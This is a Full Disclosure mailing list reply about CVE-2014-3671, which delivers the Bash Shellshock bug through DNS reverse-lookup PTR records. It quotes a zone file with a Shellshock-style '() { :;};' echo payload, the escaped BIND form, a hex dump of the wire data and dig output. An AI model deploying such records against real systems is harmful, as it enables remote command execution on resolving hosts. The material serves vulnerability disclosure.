Re: CVE-2014-3671: DNS Reverse Lookup as a vector for the Bash vulnerability (CVE-2014-6271 et.al.)

[Dirk-Willem van Gulik <dirkx () webweaving org>]

On 14 Oct 2014, at 13:04, Florian Weimer <fw () deneb enyo de> wrote:

> > A simple zone file; such as:
> >
> >     $TTL 10;
> >     $ORIGIN in-addr.arpa.
> >     @     IN SOA     ns.boem.wleiden.net dirkx.webweaving.org (
> >                    666        ; serial
> >                    360 180 3600 1800 ; very short lifespan.
> >                    )
> >     IN          NS     127.0.0.1
> >     *           PTR      "() { :;}; echo CVE-2014-6271, CVE-201407169, RDNS" 
>
> I'm surprised DNS servers grok this, should be
>
> * IN PTR \(\)\032\{\032:\;\}\;\032echo\032CVE-2014-6271\,\032CVE-201407169\,\032RDNS.
>
> Or something similar.

The production versions of NSD accepts this fine ‘as is’ (FreeBSD-9.3); bind requires a bit of careful escaping.

On te wire one then sees the raw ‘binary’ — which can indeed be very raw:

000001d0  XX XX XX XX 31 28 29 20  7b 20 3a 3b 7d 3b 20 65        () { :;}; e|
000001e0  63 68 6f 20 63 76 65 2d  32 30 31 34 2d 36 32 37  |cho cve-2014-627|
000001f0  31 2c 20 63 76 65 2d 32  30 31 34 30 37 31 36 39  |1, cve-201407169|
00000200  2c 20 72 64 6e 73 c0 14  c0 XX XX XX XX XX XX XX  |, rdns

And once you push this through DIG - one sees:

        4.3.2.1.in-addr.arpa.   10      IN      PTR     
\(\)\032{\032:\;}\;\032echo\032cve-2014-6271,\032cve-201407169,\032rdns.in-addr.arpa.

depending on your escaping (which nornal unix libc/resolve does). And then we found at least one setenv() which would 
*de-escape* above nicely - getting the octal and decimal right.

Dw.


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/